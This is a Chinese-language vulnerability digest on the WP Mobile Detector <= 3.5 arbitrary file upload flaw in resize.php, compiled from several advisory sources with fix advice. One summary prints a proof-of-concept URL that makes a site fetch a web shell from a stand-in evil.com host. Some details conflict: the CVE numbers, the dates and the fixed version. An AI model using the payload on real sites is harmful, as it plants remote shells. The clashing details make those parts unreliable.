# WP Mobile Detector 3.5 任意文件上传漏洞
## 漏洞概述
WP Mobile Detector插件在resize.php文件中缺少文件类型验证,导致任意文件上传漏洞。未认证的攻击者可以上传任意文件到受影响的服务器,从而可能实现远程代码执行。
## 影响版本
WP Mobile Detector插件版本3.5及之前的版本。
## 漏洞细节
resize.php文件中未对上传文件类型进行验证,使得攻击者可以上传恶意文件。
## 漏洞影响
攻击者可以上传任意文件,可能实现远程代码执行。
是否为 Web 类漏洞: 是
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | WP Mobile Detector plugin for WordPress <= 3.5 contains an unrestricted file upload vulnerability caused by missing file type validation in resize.php, letting unauthenticated attackers upload arbitrary files, potentially leading to remote code execution. | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2016/CVE-2016-15043.yaml | POC详情 |
标题: WP Mobile Detector Vulnerability <= 3.5 Exploit POC – Aaditya Purani – Hacker -- 🔗来源链接
标签:
神龙速读:
### 关键信息
- **漏洞类型**: 任意文件上传漏洞 (Arbitrary File Upload Vulnerability)
- **受影响版本**: WP Mobile Detector 插件 <= 3.5 版本
- **漏洞文件**: `/wp-content/plugins/wp-mobile-detector/resize.php`
- **漏洞原因**:
- `file_get_contents()` 函数用于获取请求中的文件内容,但未对输入进行验证或清理。
- 缺乏服务器端安全检查,允许攻击者滥用 `resize` 功能上传任意文件。
- **利用方式**:
- 通过 URL 参数 `src` 发送请求,例如:`http://[WebServer]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of file to upload]`
- 可以上传外部图片,如 `http://xyz.com/smile.png`,并保存到 `http://[WebServer]/wp-content/plugins/wp-mobile-detector/cache/[filename]`
- **修复建议**:
- 更新插件至 3.7 版本。
- 禁用插件或禁用 PHP 执行权限(不推荐)。
- 安装防火墙或监控系统防止未来攻击。
- **补丁措施**:
- 白名单化某些扩展名(如 `.png`, `.gif`, `.jpg` 等),并对其他扩展名进行检查过滤。
标题: www.pluginvulnerabilities.com -- 🔗来源链接
标签:
神龙速读:
从这个网页截图中可以获取到以下关于漏洞的关键信息:
- **访问被拒绝**:`Access to www.pluginvulnerabilities.com was denied`
- **无授权访问**:`You don't have authorization to view this page.`
- **HTTP错误代码**:`HTTP ERROR 403`
这些信息表明,尝试访问 `www.pluginvulnerabilities.com` 时,由于缺乏必要的权限,导致访问请求被服务器拒绝,并返回了HTTP 403错误。这可能意味着该网站对某些用户或IP地址进行了访问限制,以防止未经授权的访问,从而保护其内容免受潜在的安全威胁。
标题: WP Mobile Detector – WordPress plugin | WordPress.org -- 🔗来源链接
标签:
神龙速读:
从这个网页截图中可以获取到以下关于漏洞的关键信息:
- **插件名称**: wp-mobile-detector
- **开发者**: websitezcom
- **版本**: 3.9
- **最后更新时间**: 9年前
- **WordPress兼容版本**: 2.7或更高
- **测试至版本**: 4.5.33
这些信息表明该插件已经很久没有更新,可能存在安全漏洞。建议用户谨慎使用,并考虑寻找更安全的替代方案。
标题: WP Mobile Detector <= 3.5 - Arbitrary File Upload -- 🔗来源链接
标签:
神龙速读:
### 关键漏洞信息
- **漏洞名称**: WP Mobile Detector <= 3.5 - Arbitrary File Upload
- **CVSS评分**: 9.8 (严重)
- **CVE编号**: CVE-2015-7467
- **公开发布日期**: June 3, 2016
- **最后更新日期**: July 19, 2015
- **研究者**: Aaditya Purani
#### 描述
WP Mobile Detector插件在版本3.5及以下存在任意文件上传漏洞,由于在resize.php文件中缺少文件类型验证,导致未授权攻击者可以上传任意文件到受影响的站点服务器,可能执行远程代码。
#### 影响版本
- **受影响版本**: <= 3.5
- **修复版本**: 3.6
#### 修复建议
- 更新至版本3.6或更高版本。
标题: WP Mobile Detector < 3.6 – Unauthenticated Arbitrary File Upload | Plugin Vulnerabilities -- 🔗来源链接
标签:
神龙速读:
### 关键信息
#### 漏洞描述
- **漏洞名称**: WP Mobile Detector < 3.6 - Unauthenticated Arbitrary File Upload
- **影响插件**: wp-mobile-detector WordPress 插件
- **漏洞类型**: 任意文件上传安全漏洞
#### 影响版本
- **受影响版本**: < 3.6
- **修复版本**: 3.6
#### 证明概念 (PoC)
```plaintext
http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php
```
#### 参考链接
- [Sucuri Blog](https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html)
- [Plugin Vulnerabilities](https://www.pluginvulnerabilities.com/2016/05/31/arbitrary-file-upload-vulnerability-in-wp-mobile-detector/)
#### 提交者信息
- **提交者**: firefart
- **网站**: https://firefart.at/
- **Twitter**: _FireFart_
#### 时间线
- **公开发布日期**: 2016-06-03
- **添加日期**: 2016-06-03
- **最后更新日期**: 2021-09-21
#### 其他相关漏洞
- B-Banner Slider <= 11 - Authenticated (Subscriber+) Arbitrary File Upload
- Reganto - Remote File Upload
- Viral Optins - Arbitrary File Upload
- Photo Gallery <= 1.2.5 - Unrestricted File Upload
- JS Job Manager <= 2.0.2 - Unauthenticated Arbitrary File Upload
暂无评论